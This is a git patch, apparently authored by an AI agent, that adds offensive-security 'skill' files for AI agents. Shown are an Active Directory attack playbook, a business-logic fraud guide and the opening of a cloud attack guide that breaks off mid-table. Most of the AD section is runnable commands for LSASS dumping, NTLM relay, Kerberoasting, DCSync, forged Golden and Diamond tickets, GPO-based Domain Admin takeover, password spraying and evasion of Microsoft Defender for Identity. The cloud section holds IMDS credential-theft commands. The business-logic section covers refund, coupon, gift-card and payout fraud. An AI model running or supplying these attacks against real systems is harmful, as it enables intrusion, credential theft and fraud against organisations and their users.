From bce27a2b8e4c91c515c35a25b55bd38fe16c9b8c Mon Sep 17 00:00:00 2001 From: Claude Date: Wed, 6 May 2026 07:45:25 +0000 Subject: [PATCH 1/4] Add 7 offensive skills: AD, wifi, business-logic, toctou, iot, mobile, cloud - offensive-active-directory: AD attack methodology (Kerberoast, ASREPRoast, ACL abuse, ADCS ESC1-15, delegation, coercion, persistence, hybrid AAD) - offensive-wifi: 802.11 attacks (WPA2/WPA3, EAP, KARMA/Mana, KRACK, WPS) - offensive-business-logic: workflow bypass, price/coupon/refund abuse, race conditions, anti-fraud defeat, chain construction - offensive-toctou: time-of-check/use across binary/kernel/web/container layers with window-widening primitives - offensive-iot: hardware recon, firmware extraction, RTOS, ICS/OT, wireless protocols (Zigbee/BLE/Z-Wave/LoRaWAN), MQTT/CoAP - offensive-mobile: Android+iOS pentest (Frida, pinning bypass, storage, biometric, deep links, Firebase) [category-sized] - offensive-cloud: AWS+Azure+GCP attack paths (privesc, IMDS, cross-account, persistence, CSPM evasion) [category-sized] --- Skills/offensive-active-directory/SKILL.md | 428 ++++++++++++++++++++ Skills/offensive-business-logic/SKILL.md | 398 +++++++++++++++++++ Skills/offensive-cloud/SKILL.md | 346 ++++++++++++++++ Skills/offensive-iot/SKILL.md | 435 +++++++++++++++++++++ Skills/offensive-mobile/SKILL.md | 422 ++++++++++++++++++++ Skills/offensive-toctou/SKILL.md | 347 ++++++++++++++++ Skills/offensive-wifi/SKILL.md | 345 ++++++++++++++++ 7 files changed, 2721 insertions(+) create mode 100644 Skills/offensive-active-directory/SKILL.md create mode 100644 Skills/offensive-business-logic/SKILL.md create mode 100644 Skills/offensive-cloud/SKILL.md create mode 100644 Skills/offensive-iot/SKILL.md create mode 100644 Skills/offensive-mobile/SKILL.md create mode 100644 Skills/offensive-toctou/SKILL.md create mode 100644 Skills/offensive-wifi/SKILL.md diff --git a/Skills/offensive-active-directory/SKILL.md b/Skills/offensive-active-directory/SKILL.md new file mode 100644 index 0000000..46a1b79 --- /dev/null +++ b/Skills/offensive-active-directory/SKILL.md @@ -0,0 +1,428 @@ +--- +name: offensive-active-directory +description: "Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments." +--- + +# Active Directory — Offensive Testing Methodology + +## Quick Workflow + +1. Recon AD structure offline (BloodHound, ADExplorer snapshot) — minimize live queries +2. Harvest creds via poisoning, Kerberoasting, ASREProast, or LSASS where allowed +3. Map attack paths to Domain Admin / Enterprise Admin / Tier 0 +4. Execute path with lowest detection cost, validate at each hop +5. Establish persistence and document every action with timestamps + +--- + +## Reconnaissance + +### BloodHound Collection + +```powershell +# SharpHound (CSharp collector) — most stealthy with throttling +SharpHound.exe -c All,GPOLocalGroup --Throttle 1000 --Jitter 30 --ZipFileName recon.zip + +# Stealth collection (DC-only, avoids workstation noise) +SharpHound.exe -c DCOnly --Stealth + +# Bloodhound.py from Linux (no Windows host needed) +bloodhound-python -d corp.local -u user -p pass -ns 10.0.0.1 -c All +``` + +### PowerView (No Tool Drop) + +```powershell +# Domain enumeration without binaries +$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() +Get-DomainUser -SPN | Select samaccountname,serviceprincipalname +Get-DomainComputer -Unconstrained +Get-DomainGPO | ?{$_.gpcmachineextensionnames -match "Restricted Groups"} +Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | + ?{$_.ActiveDirectoryRights -match 'WriteDacl|GenericAll|WriteOwner'} +``` + +### ADExplorer Offline + +``` +# Take snapshot from any low-priv user, analyze offline +ADExplorer.exe → File → Create Snapshot +# Convert to BloodHound format +ADExplorerSnapshot.py snapshot.dat -o output/ +``` + +--- + +## Credential Harvesting + +### LLMNR / NBT-NS / mDNS Poisoning + +```bash +# Capture NetNTLMv2 hashes from broadcast resolution +responder -I eth0 -wrf + +# Inveigh (Windows-side, when you have a foothold) +Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y +``` + +Crack with hashcat mode 5600. If cracking fails, relay instead. + +### NTLM Relay + +```bash +# Identify relay targets (no SMB signing, LDAP signing not required) +nxc smb 10.0.0.0/24 --gen-relay-list relay-targets.txt + +# Relay to LDAP/LDAPS for ACL abuse, ADCS for cert request +impacket-ntlmrelayx -tf relay-targets.txt -smb2support \ + --escalate-user attacker --delegate-access + +# Relay to ADCS Web Enrollment (ESC8) — requires HTTP endpoint up +impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \ + --adcs --template DomainController +``` + +### Kerberoasting + +```powershell +# Request TGS for all SPN-bearing accounts +Rubeus.exe kerberoast /outfile:tgs.txt /nowrap +# AES-only accounts (harder to crack but worth attempting) +Rubeus.exe kerberoast /aes /outfile:tgs_aes.txt +``` + +```bash +# Cross-platform from Linux +impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -request +hashcat -m 13100 tgs.txt rockyou.txt -r OneRuleToRuleThemAll.rule +``` + +### ASREProasting + +```bash +# Find users with DONT_REQUIRE_PREAUTH set +impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass +hashcat -m 18200 asrep.txt rockyou.txt +``` + +### LSASS / SAM Dumping + +```cmd +:: Modern, AV-friendly: comsvcs.dll minidump +rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump C:\out.dmp full + +:: Task Manager → lsass.exe → Create dump file (GUI route, no binary drop) + +:: nanodump (handle duplication, no MiniDumpWriteDump) +nanodump.exe --pid -w lsass.dmp --valid +``` + +Parse with Mimikatz or pypykatz offline: + +```bash +pypykatz lsa minidump lsass.dmp +``` + +--- + +## Privilege Escalation Within AD + +### ACL Abuse + +| Right | Abuse | +|-------|-------| +| `GenericAll` / `GenericWrite` | Add SPN → Kerberoast; reset password; add member | +| `WriteDacl` | Grant yourself DCSync rights, then DCSync | +| `WriteOwner` | Take ownership → grant rights → exploit | +| `AllExtendedRights` (User) | Force password change | +| `AllExtendedRights` (Domain) | DCSync | +| `AddMember` | Add self to privileged group | +| `WriteSPN` | Set SPN, kerberoast target | + +```powershell +# Targeted Kerberoast (write SPN, roast, remove SPN) +Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/SPN'} +Rubeus.exe kerberoast /user:victim +Set-DomainObject -Identity victim -Clear serviceprincipalname + +# Grant DCSync via WriteDacl +Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' \ + -PrincipalIdentity attacker -Rights DCSync +``` + +### Kerberos Delegation + +```powershell +# Find delegation +Get-DomainComputer -Unconstrained +Get-DomainUser -TrustedToAuth +Get-DomainComputer -TrustedToAuth + +# Unconstrained → wait for / coerce DC auth, capture TGT +Rubeus.exe monitor /interval:5 /nowrap + +# Constrained (S4U2self/S4U2proxy) — impersonate any user to allowed SPN +Rubeus.exe s4u /user:svc_acct /rc4: /impersonateuser:Administrator \ + /msdsspn:cifs/dc.corp.local /ptt + +# Resource-Based Constrained Delegation (RBCD) — write msDS-AllowedToActOnBehalfOfOtherIdentity +# Requires GenericAll/GenericWrite on the target computer object +``` + +### Coercion Primitives + +| Technique | Tool / RPC | +|-----------|-----------| +| PetitPotam | `MS-EFSRPC` (`EfsRpcOpenFileRaw`, `EfsRpcEncryptFileSrv`) | +| PrinterBug | `MS-RPRN` (`RpcRemoteFindFirstPrinterChangeNotificationEx`) | +| DFSCoerce | `MS-DFSNM` (`NetrDfsRemoveStdRoot`) | +| ShadowCoerce | `MS-FSRVP` | +| WebDAV | Search-and-replace UNC path embedded in any web fetch | + +```bash +# Coerce + relay full chain +impacket-ntlmrelayx -t ldap://dc -smb2support --delegate-access & +PetitPotam.py -u low -p pass attacker-ip dc-ip +# Result: RBCD set, S4U → DA on coerced machine +``` + +### GPO Abuse + +```powershell +# Find GPOs you can edit +Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | + ?{ $_.SecurityIdentifier -eq (Get-DomainUser current).objectsid ` + -and $_.ActiveDirectoryRights -match 'WriteProperty|WriteDacl' } + +# SharpGPOAbuse — add scheduled task / immediate task to GPO +SharpGPOAbuse.exe --AddComputerTask --TaskName Update --Author NT\System \ + --Command cmd.exe --Arguments "/c net group 'Domain Admins' attacker /add /domain" \ + --GPOName "Workstation Policy" +``` + +--- + +## ADCS Abuse — ESC1 through ESC15 + +### Enumeration + +```bash +certipy find -u user@corp.local -p pass -dc-ip 10.0.0.1 -vulnerable -stdout +``` + +### Common Misconfigurations + +| ID | Misconfig | Exploitation | +|----|-----------|--------------| +| ESC1 | Client Auth + ENROLLEE_SUPPLIES_SUBJECT | Request cert with arbitrary UPN | +| ESC2 | Any Purpose EKU | Request cert valid for any use | +| ESC3 | Enrollment Agent | Request agent cert, then on-behalf-of any user | +| ESC4 | Vulnerable template ACL | Modify template to ESC1 | +| ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 on CA | SAN injection on any template | +| ESC7 | Vulnerable CA ACL (ManageCA) | Approve own pending requests | +| ESC8 | Web Enrollment HTTP + no EPA | NTLM relay → cert | +| ESC9 | No security extension + UPN | UPN spoofing post-account-rename | +| ESC10 | StrongCertificateBindingEnforcement weak | UPN spoofing without rename | +| ESC11 | RPC unprotected (no ICertPassage IF_ENFORCEENCRYPTICERTREQUEST) | Relay over RPC | +| ESC13 | Issuance policy linked to group | Cert grants group membership | +| ESC14 | altSecurityIdentities write | Map attacker cert to admin | +| ESC15 | EKUwu — schema v1 templates | Inject EKU at request time | + +### ESC1 Exploitation + +```bash +# Request cert as Administrator +certipy req -u user@corp.local -p pass -ca CORP-CA -template VulnTemplate \ + -upn administrator@corp.local + +# Use cert to get TGT and NT hash via UnPAC-the-Hash +certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1 +``` + +### ESC8 (Web Enrollment Relay) + +```bash +# Coerce any DC, relay to ADCS Web Enrollment, request DC cert +impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \ + --adcs --template DomainController & +PetitPotam.py attacker-ip dc.corp.local +# Result: cert for DC$ → TGT → DCSync +``` + +--- + +## Lateral Movement + +### Pass-the-Hash / Overpass-the-Hash + +```bash +# PTH with NT hash +nxc smb 10.0.0.0/24 -u admin -H --local-auth +impacket-psexec corp/admin@target -hashes : + +# Overpass-the-Hash (NT hash → TGT, useful for Kerberos-only targets) +Rubeus.exe asktgt /user:admin /rc4: /ptt +``` + +### Pass-the-Ticket + +```powershell +# Inject TGT +Rubeus.exe ptt /ticket:base64.kirbi +# Or from .ccache +KRB5CCNAME=admin.ccache impacket-secretsdump -k -no-pass dc.corp.local +``` + +### Silent Lateral Tools + +```bash +# WinRM (no event logs in default channel for command exec) +evil-winrm -i target -u admin -H + +# SMB exec without service creation (uses task scheduler) +impacket-atexec corp/admin@target -hashes : "whoami" + +# WMI +impacket-wmiexec corp/admin@target -hashes : + +# DCOM (MMC20.Application, ShellWindows, ShellBrowserWindow) +Invoke-DCOM -ComputerName target -Method MMC20 -Command "calc.exe" +``` + +--- + +## Persistence + +### Golden Ticket (krbtgt forge) + +```bash +# Requires krbtgt NT hash (from DCSync) +impacket-ticketer -nthash -domain-sid S-1-5-21-... -domain corp.local Administrator +KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass dc.corp.local +``` + +### Silver Ticket (per-service forge) + +```bash +# Forge TGS for a specific service using its account hash +impacket-ticketer -nthash -domain-sid -domain corp.local \ + -spn cifs/server.corp.local Administrator +``` + +### Diamond / Sapphire Ticket (modern, evades MDI on krbtgt) + +```bash +# Diamond — modify legitimate TGT in-flight (no krbtgt hash on wire) +Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 +``` + +### DCSync + +```bash +impacket-secretsdump -just-dc-user 'corp/krbtgt' corp/admin@dc -hashes : +# In-memory PowerShell variant (Mimikatz) +Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"' +``` + +### DCShadow (register rogue DC, push changes) + +``` +mimikatz # !+ +mimikatz # !processtoken +mimikatz # lsadump::dcshadow /object:CN=victim,... /attribute:primaryGroupID /value:519 +mimikatz # lsadump::dcshadow /push +``` + +### AdminSDHolder + +Add ACE granting your account `GenericAll` on `CN=AdminSDHolder,CN=System,DC=corp,DC=local`. SDProp propagates to all protected groups every 60 minutes. + +--- + +## Forest & Trust Attacks + +```powershell +# Map trusts +Get-DomainTrust -SearchBase "DC=corp,DC=local" +Get-ForestTrust + +# SID History injection (cross-forest if SID filtering disabled) +# ExtraSids in golden ticket → admin in trusted forest +impacket-ticketer -nthash -domain-sid \ + -extra-sid S-1-5-21--519 -domain child.corp.local Administrator + +# Trust ticket forging (inter-realm TGT) +Rubeus.exe asktgs /service:krbtgt/parent.local /ticket:trust-ticket.kirbi +``` + +--- + +## Hybrid AD / Entra ID (Azure AD) Pivots + +| Pivot | Path | +|-------|------| +| AAD Connect server compromise | Dump MSOL_ account → DCSync on-prem | +| Seamless SSO | Forge Kerberos ticket for `AZUREADSSOACC$` → cloud SSO any user | +| PTA agent | DLL hijack `Microsoft.Azure.SecurityTokenService` → harvest cleartext | +| PHS hash sync | Read on-prem hashes from AAD Connect SQL (ADSync DB) | +| Federated trust | Forge SAML token via stolen ADFS token-signing cert (Golden SAML) | +| Pass-the-PRT | Steal PRT cookie from device → cloud session as user | + +```powershell +# AADInternals — Hybrid identity attack toolkit +Get-AADIntADSyncCredentials # Extract MSOL_ creds from AAD Connect +Open-AADIntOffice365Portal -AccessToken $token +New-AADIntSAMLToken -ImmutableID 'a==' -Issuer 'http://sts/adfs/services/trust' \ + -PfxFileName 'token-signing.pfx' +``` + +--- + +## Detection Evasion (MDI / Defender for Identity) + +| MDI Detector | Evasion | +|--------------|---------| +| Honeytoken account access | Always check `description` and recent activity before hitting accounts | +| Reconnaissance via SAMR | Use ADWS / LDAP-only collection, throttle | +| Suspicious Kerberos delegation | Avoid noisy `S4U2self` chains on monitored DCs | +| Golden/Silver Ticket detection | Use Diamond/Sapphire variants; match legitimate ticket lifetime/encryption | +| DCSync from non-DC | Relay through legitimate replication-permitted accounts | +| Pass-the-Hash | Use overpass-the-hash to convert to Kerberos before lateraling | + +```powershell +# Identify MDI sensors before noisy actions +Get-DomainComputer -SPN '*MicrosoftATA*' +Get-DomainComputer | ?{ $_.servicePrincipalName -match 'AATPSensor' } +``` + +--- + +## Engagement Cheatsheet + +```bash +# 1. Anonymous LDAP enum (no creds) +ldapsearch -x -H ldap://dc -s base -b "" "(objectclass=*)" +nxc ldap dc -u '' -p '' --users + +# 2. Null SMB session +nxc smb dc -u '' -p '' --shares +impacket-rpcclient -U '' dc -no-pass + +# 3. Password spray (low and slow) +nxc smb dc -u users.txt -p 'Winter2025!' --continue-on-success + +# 4. Once authed: full enum + BloodHound +bloodhound-python -d corp.local -u user -p pass -ns dc -c All --zip + +# 5. Identify attack path → execute → loot → persist +``` + +--- + +## Key References + +- MITRE ATT&CK: TA0006 (Credential Access), TA0008 (Lateral Movement), T1558 (Steal/Forge Kerberos) +- ADCS: SpecterOps "Certified Pre-Owned" (Schroeder, Christensen) +- BloodHound: bloodhound.specterops.io +- Coercion: github.com/p0dalirius/Coercer (unified coercion toolkit) +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/active-directory.md diff --git a/Skills/offensive-business-logic/SKILL.md b/Skills/offensive-business-logic/SKILL.md new file mode 100644 index 0000000..0a0604a --- /dev/null +++ b/Skills/offensive-business-logic/SKILL.md @@ -0,0 +1,398 @@ +--- +name: offensive-business-logic +description: "Business logic vulnerability testing for web/mobile/API engagements. Covers workflow bypass, state machine violations, multi-step process abuse, price/quantity/discount manipulation, currency confusion, coupon stacking, refund/chargeback abuse, race conditions on logic boundaries, parameter tampering for hidden flows, role/tenant boundary violations, time-of-check vs use, anti-automation defeat, fraud-detection evasion, and subscription/quota abuse. Use when scoping an application after surface-level OWASP Top 10 has been covered, or when the asset is a transactional/marketplace/fintech/e-commerce/SaaS app where logic flaws produce direct financial impact." +--- + +# Business Logic — Offensive Testing Methodology + +Business logic flaws are the highest-paying class of vulnerability for bug bounty and the hardest for scanners to detect. They live in the gap between what the developer specified and what an attacker can convince the system to accept. + +## Quick Workflow + +1. Map every multi-step flow as a state machine (states + allowed transitions + side effects) +2. For each transition, ask: who can call it, in what state, with what inputs, how many times +3. Probe each axis (state, identity, input, frequency) for assumptions +4. Combine flaws — single-axis flaws are usually low severity; chains are critical +5. Quantify financial impact per finding (loss-per-attack × scale) + +--- + +## Reconnaissance — Mapping the Logic + +### Build the State Machine + +For each user flow, draw: +- **States**: cart, pending payment, paid, shipped, refunded, cancelled +- **Transitions**: which API/UI action, which role, which preconditions +- **Side effects**: balance change, inventory change, email, webhook + +Look for transitions that: +- Skip intermediate states (`cart` → `shipped` without `paid`) +- Are reversible when they shouldn't be (`shipped` → `cart`) +- Trigger side effects more than once +- Allow cross-role invocation + +### Hidden / Internal Endpoints + +```bash +# Compare authenticated and unauthenticated JS bundles for buried admin routes +diff <(curl https://app/main.js) <(curl -H "Cookie: ..." https://app/main.js) + +# Look for flag/feature toggles that change UI but not server-side enforcement +grep -E '(isAdmin|isInternal|featureFlag|debug)' bundle.js + +# API spec (OpenAPI/Swagger) often lists endpoints the UI never calls +curl https://app/api/openapi.json | jq '.paths | keys' +``` + +--- + +## Workflow / State-Machine Bypass + +### Skip a Required Step + +```http +# Normal flow: /verify-email → /set-password → /enable-2fa → /dashboard +# Try jumping directly: +GET /dashboard +GET /api/account/details +POST /api/payout-settings +``` + +```http +# Checkout flow: /cart → /address → /shipping → /payment → /confirm +# Skip /payment by replaying /confirm with a previous order's payment-token reference: +POST /api/order/confirm +{ "cartId": "current", "paymentRef": "" } +``` + +### Replay a One-Time Action + +```http +# Refund endpoint without idempotency +POST /api/orders/123/refund # First call: $50 refunded, order marked refunded +POST /api/orders/123/refund # Second call: server checks "is order refunded?" — race the check (see TOCTOU) +``` + +### State Downgrade + +Move a finalized object back to an editable state where mutations have effect: + +```http +PUT /api/order/123 +{ "status": "draft" } # If accepted, you can now edit the price field +PUT /api/order/123 +{ "items": [{ "id": "tv", "price": 1 }] } +``` + +### Direct Endpoint Invocation + +Many admin/backend transitions are reachable from any authenticated user if route-level RBAC is missing while the UI hides them. + +```bash +# Enumerate verbs on every discovered path +for path in $(cat paths.txt); do + for v in GET POST PUT PATCH DELETE OPTIONS; do + code=$(curl -s -o /dev/null -w "%{http_code}" -X $v -H "Authorization: Bearer $T" https://app$path) + echo "$v $path $code" + done +done | grep -v -E ' (401|403|404) ' +``` + +--- + +## Price / Quantity / Currency Manipulation + +### Negative / Zero / Float Quantities + +```http +POST /api/cart/add +{ "sku": "tv", "qty": -1 } # Refund issued for adding negative items? +{ "sku": "tv", "qty": 0.0001 } # Float rounding: $0 line item, full product shipped? +{ "sku": "tv", "qty": 9e99 } # Overflow → wraps to small number, $0 cost? +``` + +### Hidden Price Fields + +```http +POST /api/checkout +{ "items": [{"sku":"tv","qty":1,"price":1}], "total": 1, "tax": 0, "shipping": 0 } +``` + +If the server trusts client-supplied `price`, you set the price. Test every numeric field — `price`, `total`, `discount`, `tax`, `shipping`, `subtotal`, `currency`. + +### Currency Confusion + +```http +POST /api/checkout +{ "amount": 100, "currency": "JPY" } # Pay 100 JPY (~$0.65) for $100 USD product? +{ "amount": 100, "currency": "VND" } # Even better +{ "amount": 100, "currency": "BTC" } # Or worse: pay in BTC at $1 BTC = $1? +``` + +Look for: missing currency normalization, sloppy FX rate caching, currency lookup by user input. + +### Coupon / Discount Logic + +```http +# Apply same coupon multiple times +POST /api/cart/coupon { "code": "SAVE50" } +POST /api/cart/coupon { "code": "SAVE50" } # Stacks? +POST /api/cart/coupon { "code": "save50" } # Case sensitivity gives second slot? +POST /api/cart/coupon { "code": "SAVE50 " } # Whitespace ditto? + +# Coupon for a different product +POST /api/cart/apply-coupon { "code": "FREEMOUSE", "appliedTo": "macbook" } + +# Negative discount (becomes a surcharge that reduces total when coupon stacked with another) +POST /api/admin/coupon { "code": "X", "percent": -50 } # If admin endpoint reachable + +# Expired coupon: change date in payload? +POST /api/cart/coupon { "code": "BLACKFRIDAY", "appliedAt": "2023-11-25T00:00:00Z" } +``` + +### Cart Tampering + +```http +# Add a cheap item, edit the SKU server-side +POST /api/cart/add { "sku": "pen", "qty": 1 } +PUT /api/cart/items/abc { "sku": "macbook" } # SKU swap with pen's price retained? +``` + +--- + +## Refund / Chargeback / Payout Abuse + +### Refund More Than You Paid + +```http +POST /api/orders/123/refund { "amount": 99999 } +``` + +### Refund After Returning Less + +Order ships 5 items, you return 1, request refund for full order. Logic should compute refund per returned item; if it computes per *order*, free items. + +### Convert Refund to Different Method + +```http +POST /api/orders/123/refund { "method": "store-credit" } +# vs original card payment → store credit can be transferred / sold +``` + +### Payout Account Race + +```http +PUT /api/payout-account { "iban": "ATTACKER" } +POST /api/withdraw { "amount": 1000 } +PUT /api/payout-account { "iban": "ORIGINAL" } # Restore before audit +``` + +--- + +## Identity / Tenant / Role Boundary + +### Role Confusion via Multipart / Parameter Pollution + +```http +POST /api/users/me +role=user&role=admin # Last-wins parser → admin +{"role": "user", "role": "admin"} # JSON last-wins +``` + +### Tenant ID Substitution in Hidden Field + +```http +POST /api/invoices +{ "amount": 100, "tenantId": "victim-corp", "billTo": "attacker" } +# Charges victim-corp for attacker's order +``` + +### Mass Assignment / Field Whitelist + +```http +PUT /api/users/me +{ "email": "x@y.com", "isAdmin": true, "credits": 10000, "tenantId": "victim" } +``` + +Test every field that exists on the model, not just those the form exposes. + +### Indirect Privilege via Object Linking + +```http +POST /api/projects/PUBLIC-PROJECT/share-token # Anyone can mint +GET /api/projects/PUBLIC-PROJECT/internal-only-data?token=... +# Sharing API meant for collaborators bypasses role check on data API +``` + +--- + +## Race Conditions on Logic Boundaries + +Logic checks that read state, then act on state, are TOCTOU-vulnerable. (Also see: `offensive-toctou`, `offensive-race-condition`.) + +### Single-Packet Multi-Request + +```python +# Burp Repeater "Send group in parallel (single-packet attack)" — HTTP/2 over TLS, +# all requests' last frames sent in one TCP segment. Server processes them concurrently. +``` + +### Common Logic Races + +| Flow | Race | +|------|------| +| Coupon redemption | N parallel `apply-coupon` calls each see "unused" | +| 2FA verification | Submit code N times in parallel before lockout counter increments | +| Withdrawal | Parallel withdraws each see full balance | +| Vote / Like / Reaction | "One per user" check raced | +| Invitation acceptance | Multiple accepts → multiple seats granted | +| Free-trial signup | Parallel signups → multiple trials per email | +| Gift-card redeem | Parallel redeems → multi-spend a single card | +| Inventory reservation | Parallel buys of last item → oversell, supplier covers difference | + +### Amplification + +```python +# Send 30 parallel "redeem $10 gift card" requests, all see balance = $10 +# Result: $300 credited from a $10 card +``` + +--- + +## Anti-Automation / Fraud Defeat + +### Captcha / Rate Limit Bypass + +| Bypass | Mechanic | +|--------|----------| +| Token reuse | One captcha solve, replay token across many requests | +| Endpoint mirror | `/api/v1/login` rate-limited, `/api/v2/login` not | +| Header rotation | `X-Forwarded-For: ` resets per-IP counter | +| HTTP/2 stream multiplexing | Each stream counted as same conn → window only | +| Method/case variation | `POST /Login` vs `POST /login` keyed differently in cache | + +### Device Fingerprint / Velocity + +- New device → require step-up auth. Replay captured device cookies / FingerprintJS hash. +- Velocity counters (5 logins/hour) often per `(userid, ip)` not per `userid`. +- Risk score thresholds: small purchases skip review. Test the boundary ($99.99 vs $100). + +### Free Trial / Sign-Up Abuse + +```http +# Email aliasing +attacker+1@gmail.com, attacker+2@gmail.com # Plus-aliasing +attacker.@gmail.com, a.t.t.acker@gmail.com # Dots ignored on Gmail +attacker@googlemail.com # gmail/googlemail equivalence + +# Phone number recycling (number-portable VOIP) — identity not unique +# Device-ID rotation (mobile testing) — wipe storage, new install +``` + +### Referral / Reward Loops + +```http +POST /api/refer { "email": "a@x.com" } # +$5 to me when they sign up +# Sign up the alias, receive referral +POST /api/refer { "email": "a+1@x.com" } # Repeat — many sign-ups, all same person +``` + +--- + +## Subscription / Quota / Tier Abuse + +### Tier Downgrade Retains Premium Features + +```http +PUT /api/subscription { "tier": "free" } # Cancel paid +GET /api/feature/premium-export # Still works because feature flag cached? +``` + +### Mid-Cycle Quota Reset + +```http +PUT /api/subscription { "tier": "pro" } # +1000 quota +PUT /api/subscription { "tier": "free" } # Resets to 0? Or just caps display? +PUT /api/subscription { "tier": "pro" } # +1000 again — net 2000 in one cycle +``` + +### Add-On Stacking + +```http +POST /api/addons { "id": "extra-storage" } # +10GB +POST /api/addons { "id": "extra-storage" } # Stacks to 20GB? +POST /api/addons { "id": "extra-storage" } # Or charges once, stacks N times? +``` + +--- + +## Time-Based Logic + +### Time Travel via Headers + +```http +POST /api/checkout +Date: Wed, 01 Jan 2020 00:00:00 GMT # Server-trusted time? +X-Request-Time: 1577836800 +``` + +### Promotion Window + +Set client-side date to inside the window, server validates `X-Promo-Time` parameter. Stale promo cache means yesterday's prices apply today. + +### Token / Session Expiry + +Refresh token endpoint that doesn't check the original token's expiry → indefinite session extension. + +--- + +## Combining Flaws — Where the Crits Live + +Single-axis findings are interesting; **chains** are payouts. + +**Example chain (real, paid bounty):** +1. Coupon stacking allows `100% off` × 2 → negative total +2. Negative total → store credit issued (refund of "overpayment") +3. Store credit transferable to gift card +4. Gift card race condition → multiplied +5. Gift card redeemable on partner site for cash equivalents + +**Chain template:** +- Find a thing the system gives you (credit, points, slot, seat) +- Find a way to multiply it (race, replay, stacking) +- Find a way to convert it to value (transfer, refund, payout) + +--- + +## Engagement Approach + +``` +Day 1: Map state machines for top 3 money flows. +Day 2: Per state, list what the UI does. Check what the API allows. +Day 3: Single-axis tests (price tampering, role mass-assignment, replay, currency). +Day 4: Race conditions on every "one-shot" action. +Day 5: Chain the findings. Quantify financial impact per chain. +``` + +Document each finding as: pre-conditions → exact request sequence → state delta → financial impact per execution → scaling factor. + +--- + +## Reporting Hooks + +Business-logic findings often get downgraded by triagers who don't understand the chain. Always include: + +- A diagram of the intended flow vs. the achieved flow +- A scripted PoC that runs end-to-end (no manual steps) +- A dollar value per execution and a feasibility statement for repeating it +- The fix at the right layer (state machine validator, not just input validation) + +--- + +## Key References + +- OWASP WSTG-BUSL — Business Logic Testing chapter +- PortSwigger Web Security Academy: Business logic vulnerabilities track +- MITRE ATT&CK: T1539 (Steal Web Session Cookie), T1078 (Valid Accounts) — for chained access +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/business-logic.md diff --git a/Skills/offensive-cloud/SKILL.md b/Skills/offensive-cloud/SKILL.md new file mode 100644 index 0000000..2d374ac --- /dev/null +++ b/Skills/offensive-cloud/SKILL.md @@ -0,0 +1,346 @@ +--- +name: offensive-cloud +description: "Cloud security attack methodology covering AWS, Azure, and GCP. Includes credential harvesting (IMDS, ~/.aws, env vars, leaked CI secrets, instance roles), enumeration with cloud-specific tools (pacu, ScoutSuite, Prowler, ROADtools, gcp_enum), privilege escalation paths (IAM PassRole, AssumeRole chains, Lambda/Functions privilege flips, Azure Owner-on-self, GCP serviceAccountTokenCreator), persistence techniques (IAM user/key creation, AAD app registration, GCP svc account key creation, EventBridge/Logic Apps backdoors), data exfiltration (S3/Blob/GCS, snapshot share, RDS/CosmosDB/Cloud SQL exfil), cloud-native lateral movement (cross-account assume, Azure AD multi-tenant, GCP project hierarchy), serverless attacks (Lambda env vars, layer hijack, Step Functions), Kubernetes-on-cloud (EKS/AKS/GKE-specific paths to node and AWS metadata), and CSPM evasion (CloudTrail blind spots, GuardDuty mute, Sentinel rule shaping). Use when the engagement scope is cloud accounts, when you've stolen cloud credentials, or when assessing cloud posture." +--- + +# Cloud (AWS / Azure / GCP) — Offensive Testing Methodology + +## Quick Workflow + +1. Identify the cloud and the identity context you have (user, role, service account, instance role) +2. Enumerate without writes — `aws sts get-caller-identity`, `az account show`, `gcloud auth list` +3. Map permissions to known privilege-escalation primitives (PassRole, Owner, etc.) +4. Find the data and the persistence anchors before alarms fire +5. Document the kill chain with timestamps, identities, and resources for the report + +--- + +## AWS + +### Identity Discovery + +```bash +aws sts get-caller-identity +aws iam list-attached-user-policies --user-name $(aws sts get-caller-identity --query Arn --output text | awk -F/ '{print $NF}') +aws iam list-attached-role-policies --role-name +aws iam simulate-principal-policy --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \ + --action-names "*" +``` + +### IMDS Credential Theft + +```bash +# IMDSv1 (legacy) +curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ + +# IMDSv2 (modern, requires token) +TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \ + -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") +curl -H "X-aws-ec2-metadata-token: $TOKEN" \ + http://169.254.169.254/latest/meta-data/iam/security-credentials/ +``` + +From SSRF, IMDSv2 was historically reachable when the SSRF allowed setting custom headers. Modern AWS denies SSRF without `Host: 169.254.169.254` and proper `PUT`-then-`GET` flow — SSRF in 2024+ rarely yields IMDSv2 unless the proxy reflects custom headers. + +### Privilege Escalation Paths + +| Path | Required Permission | Outcome | +|------|---------------------|---------| +| `iam:PassRole` + `lambda:CreateFunction` | Pass any role to Lambda you create | Run code as that role | +| `iam:PassRole` + `ec2:RunInstances` | Pass any role to EC2 instance | IMDS → role creds | +| `iam:CreatePolicyVersion` + `iam:SetDefaultPolicyVersion` | Edit your own policy | 